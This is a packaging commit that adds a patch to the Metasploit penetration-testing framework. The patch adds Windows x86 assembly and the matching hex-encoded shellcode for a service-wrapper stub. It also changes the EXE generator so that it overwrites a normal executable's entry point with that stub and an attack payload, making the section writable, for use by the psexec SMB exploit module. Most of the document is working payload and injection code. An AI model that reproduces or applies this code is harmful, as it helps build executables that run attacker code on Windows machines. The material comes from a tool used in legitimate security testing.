1 files changed, 219 insertions, 0 deletions
diff --git a/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch b/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch
new file mode 100644
index 000000000000..4f2e353ecb7d
--- /dev/null
+++ b/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch
@@ -0,0 +1,219 @@
+diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm
+--- metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm	1970-01-01 01:00:00.000000000 +0100
++++ metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm	2013-11-20 11:50:48.256366095 +0100
+@@ -0,0 +1,64 @@
++;-----------------------------------------------------------------------------;
++; Author: agix (florian.gaultier[at]gmail[dot]com)
++; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
++; Size: 137 bytes
++;-----------------------------------------------------------------------------;
++
++[BITS 32]
++; Input: EBP must be the address of 'api_call'.
++
++push byte 0x0
++push 0x32336970
++push 0x61766461
++push esp
++push 0x726774c
++call ebp		;load advapi32.dll
++push 0x00454349
++push 0x56524553
++mov ecx, esp	;ServiceTableEntry.SVCNAME
++lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain
++push 0x00000000
++push eax
++push ecx
++mov eax,esp
++push 0x00000000
++push eax
++push 0xCB72F7FA
++call ebp		;call StartServiceCtrlDispatcherA(ServiceTableEntry)
++push 0x00000000
++push 0x56A2B5F0
++call ebp		;call ExitProcess(0)
++pop eax			;SvcCtrlHandler
++pop eax
++pop eax
++pop eax
++xor eax,eax
++ret
++cld 			;SvcMain
++call me
++me:
++pop ebp
++sub ebp, 0xd6	;ebp => hashFunction
++push 0x00464349
++push 0x56524553
++mov ecx, esp	;SVCNAME
++lea eax, [ebp+0xc9];SvcCtrlHandler
++push 0x00000000
++push eax
++push ecx
++push 0x5244AA0B
++call ebp		;RegisterServiceCtrlHandlerExA
++push 0x00000000
++push 0x00000000
++push 0x00000000
++push 0x00000000
++push 0x00000000
++push 0x00000000
++push 0x00000004
++push 0x00000010
++mov ecx, esp
++push 0x00000000
++push ecx
++push eax
++push 0x7D3755C6
++call ebp		;SetServiceStatus RUNNING
+\ No newline at end of file
+diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
+--- metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm	1970-01-01 01:00:00.000000000 +0100
++++ metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm	2013-11-20 11:50:48.256366095 +0100
+@@ -0,0 +1,17 @@
++;-----------------------------------------------------------------------------;
++; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
++; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
++; Version: 1.0 (28 July 2009)
++; Size: 189 bytes + strlen(libpath) + 1
++; Build: >build.py single_service_stuff
++;-----------------------------------------------------------------------------;
++
++[BITS 32]
++[ORG 0]
++
++  cld                    ; Clear the direction flag.
++  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
++%include "./src/block/block_api.asm"
++start:                   ;
++  pop ebp                ; pop off the address of 'api_call' for calling later.
++%include "./src/block/block_service.asm"
+\ No newline at end of file
+diff -Naur metasploit-9999.orig/lib/msf/util/exe.rb metasploit-9999/lib/msf/util/exe.rb
+--- metasploit-9999.orig/lib/msf/util/exe.rb	2013-11-20 11:50:31.748365346 +0100
++++ metasploit-9999/lib/msf/util/exe.rb	2013-11-20 11:50:48.256366095 +0100
+@@ -402,36 +402,86 @@
+ 
+     case opts[:exe_type]
+       when :service_exe
++        exe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
+         max_length = 8192
+         name = opts[:servicename]
+ 
+-        if name
+-          bo = pe.index('SERVICENAME')
+-          raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo
+-          pe[bo, 11] = [name].pack('a11')
++        if not name
++          name = Rex::Text.rand_text_alpha(7)
+         end
+-
+-        if not opts[:sub_method]
+-          pe[136, 4] = [rand(0x100000000)].pack('V')
++        #code_service could be encoded in the future
++        code_service =
++        "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
++        "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
++        "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
++        "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
++        "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
++        "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
++        "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
++        "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
++        "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
++        "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" +
++        "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" +
++        "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" +
++        "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" +
++        "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" +
++        "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" +
++        "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
++        "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
++        "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5"
++
++        pe_header_size=0x18
++        section_size=0x28
++        characteristics_offset=0x24
++        virtualAddress_offset=0xc
++        sizeOfRawData_offset=0x10
++
++        sections_table_rva = exe._dos_header.v['e_lfanew']+exe._file_header.v['SizeOfOptionalHeader']+pe_header_size
++        sections_table_offset = exe.rva_to_file_offset(sections_table_rva)
++        sections_table_characteristics_offset = exe.rva_to_file_offset(sections_table_rva+characteristics_offset)
++
++        sections_header = []
++        exe._file_header.v['NumberOfSections'].times { |i|
++          sections_header << [sections_table_characteristics_offset+(i*section_size),pe[sections_table_offset+(i*section_size),section_size]]
++        }
++
++        #look for section with entry point
++        sections_header.each do |sec|
++          virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0]
++          sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0]
++          characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0]
++          if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
++            #put this section writable
++            characteristics|=0x80000000
++            newcharacteristics = [characteristics].pack('L')
++            pe[sec[0],newcharacteristics.length]=newcharacteristics
++          end
+         end
++
++        #put the shellcode at the entry point, overwriting template
++        pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length+code.length]=code_service+code
++
+       when :dll
+         max_length = 2048
+       when :exe_sub
+         max_length = 4096
+     end
+ 
+-    bo = pe.index('PAYLOAD:')
+-    raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
++    if opts[:exe_type] != :service_exe
+ 
+-    if (code.length <= max_length)
+-      pe[bo, code.length] = [code].pack("a*")
+-    else
+-      raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
+-    end
++      bo = pe.index('PAYLOAD:')
++      raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
+ 
+-    if opts[:exe_type] == :dll
+-      mt = pe.index('MUTEX!!!')
+-      pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
++      if (code.length <= max_length)
++        pe[bo, code.length] = [code].pack("a*")
++      else
++        raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
++      end
++
++      if opts[:exe_type] == :dll
++        mt = pe.index('MUTEX!!!')
++        pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
++      end
+     end
+ 
+     return pe
+@@ -463,7 +513,7 @@
+ 
+   def self.to_win32pe_service(framework, code, opts={})
+     # Allow the user to specify their own service EXE template
+-    set_template_default(opts, "template_x86_windows_svc.exe")
++    set_template_default(opts, "template_x86_windows.exe")
+     opts[:exe_type] = :service_exe
+     exe_sub_method(code,opts)
+   end
+diff -Naur metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb metasploit-9999/modules/exploits/windows/smb/psexec.rb
+--- metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb	2013-11-20 11:50:31.988365357 +0100
++++ metasploit-9999/modules/exploits/windows/smb/psexec.rb	2013-11-20 11:50:48.256366095 +0100
+@@ -153,7 +153,7 @@
+       # Disconnect from the ADMIN$
+       simple.disconnect("ADMIN$")
+     else
+-      servicename = rand_text_alpha(8)
++      servicename = rand_text_alpha(7)
+ 
+       # Upload the shellcode to a file
+       print_status("Uploading payload...")